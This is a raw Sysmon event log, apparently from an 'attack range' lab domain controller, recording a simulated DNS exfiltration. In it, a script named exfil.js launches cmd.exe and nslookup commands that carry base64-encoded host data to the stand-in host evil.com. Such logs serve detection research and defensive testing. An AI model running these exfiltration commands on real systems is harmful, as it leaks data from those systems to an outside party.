14:21:37.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.644{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.644{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8344-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.644{2E1864BB-18E0-629A-6742-000000005F02}39763444C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-8344-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.657{2E1864BB-18F1-629A-8344-000000005F02}7208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhzmd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.644{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlthlh.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.629{2E1864BB-18F1-629A-8144-000000005F02}81087832C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8244-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.629{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8244-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.629{2E1864BB-18F1-629A-8044-000000005F02}36167284C:\Windows\system32\cmd.exe{2E1864BB-18F1-629A-8244-000000005F02}488C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.632{2E1864BB-18F1-629A-8244-000000005F02}488C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F1-629A-8044-000000005F02}3616C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlthlh.tmp 2>&1 10341000x8000000000000000211087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.613{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8144-000000005F02}8108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.613{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F1-629A-8144-000000005F02}8108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.597{2E1864BB-18F1-629A-8144-000000005F02}81087832C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-8044-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8144-000000005F02}8108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-8044-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-18E0-629A-6742-000000005F02}39766416C:\Windows\System32\WScript.exe{2E1864BB-18F1-629A-8044-000000005F02}3616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.591{2E1864BB-18F1-629A-8044-000000005F02}3616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlthlh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.582{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzmddg.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000211075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.560{2E1864BB-18F1-629A-7E44-000000005F02}61806928C:\Windows\system32\conhost.exe{2E1864BB-18F1-629A-7F44-000000005F02}7840C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.560{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F1-629A-7F44-000000005F02}7840C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211073Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.560{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211072Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 